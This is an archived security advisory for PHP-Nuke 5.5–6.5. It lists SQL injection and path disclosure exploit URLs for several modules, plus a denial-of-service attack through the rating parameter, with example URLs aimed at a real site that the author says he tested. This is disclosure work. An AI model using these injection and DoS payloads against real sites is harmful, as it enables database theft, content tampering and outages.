TUCoPS :: Web :: PHP :: bt225.txt

PHP-Nuke Denial of Service attack and more SQL Injections 




-------

Product: PHP-Nuke

Vendor: Francisco Burzi

Versions Vulnerable: 

Francisco Burzi PHP-Nuke 6.0

Francisco Burzi PHP-Nuke 6.5 RC3

Francisco Burzi PHP-Nuke 6.5 RC2

Francisco Burzi PHP-Nuke 6.5 RC1

Francisco Burzi PHP-Nuke 6.5 FINAL

Francisco Burzi PHP-Nuke 6.5 BETA 1

Francisco Burzi PHP-Nuke 6.5

                         6.5 with all patches , 

                         6.0 with  all patches. 

                         5.5 with all patches 



No vulnerable: 

?

------

DESCRIPTION:

------

New SQL Injections and Paths Disclosures related to the main modules.

Please , look at the final ` , other sql injections don't use this but 

this 

very important for make a successful query.

--------

FOUND VULNERABLE MODULES:

--------



--------

- SECTIONS (NEW)

--------

Type: SQL Injection and Path Disclosure 

*********

Exploit:  

http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR 

QUERY] (NEW)

-

http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR 

QUERY] (NEW)

-

http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR 

QUERY] (NEW)



--------

-AVANTGO

--------

Type: SQL Injection and Path disclosure. (NEW)

*********

Exploit: 

http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]



--------

-SURVEYS (NEW)

--------

Type: SQL Injection and Path disclosure.

********

Exploit:



http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]

-

http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]

&mode=&order=0&thold=0



--------

-DOWNLOADS

--------

Type: SQL Injection and Path disclosure. (NEW)

********

Exploit:

http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR 

QUERY]

-

http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR 

QUERY]&orderby=titleD



-------------

NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)

-------------

I found a denial of service possible attack in Downloads module trought 

rating system, 

Exploit:

http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE 

TO RATE]&ratinguser=?&ratinghost_name=?

&rating=999999999999999999999999999999999999999999999999999999999999999999

99999

When the file is rated the file gets a 238,609,298.89 rating , this can 

be used for make a denial of service attack to the mysql server or send a 

very long buffer (buffer overflow, stack crashes). The mysql server puts 

this because there's and error with the query ( more characters in field 

than the allowed number of characters) if you send a buffer more long 

than the allowed/accepted the server be unstable and the system pick up.



Exploit to SQL Injection and Denial of Service Attack:



http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE 

TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]



--------

- REVIEWS (NEW)

--------

Type: SQL Injection and Path disclosure.

********

Exploit:

http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]

--------

- WEB_LINKS

--------

Type: SQL Injection (NEW) and Path disclosure.(NEW)

********

Exploit:

http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]

-

http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`

[YOUR QUERY]&ratetype=num



- Web-Links module is affected by the DoS possible attack that i 

discovered and the SQL Injections and buffer overflows:

 

Exploit:



http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?

&ratinghost_name=?&rating=[DATA]



[DATA] = your random data to send ( rating points and the field buffer , 

of course ).

--------

SOLUTION:

--------

- Deactivate enterelly the affected modules.

- A temporal workaround for Path Disclosure is configuring in php.ini the 

reported error flags ( no report) but this is not very good solution ( 

WORKAROUND).

-----

WHAT CAN BE HAPPEN? AND NOTES

-----

Gain Access to phpnuke database , content changing , gain access to 

private info, server paths reveled. Mysql server buffer overflow,Mysql 

server pick up , server pick up.

-NOTES-

I tested it in phpnuke-espanol.org and it is vulnerable to all.

I tested it in phpnuke.org and it is vulnerable on active modules 

affected by this ( Downloads, Surveys )( some errors aren't reported 

because php.ini is configured for this but the vulnerabilities are 

present.).

-----

CONTACT INFO :

---------------------------------------

Lorenzo Manuel Hernandez Garcia-Hierro

--- Computer Security Analyzer ---

--www.novappc.com --

PGP: Keyfingerprint

B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2

ID: 0x9C38E1D7

**********************************

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH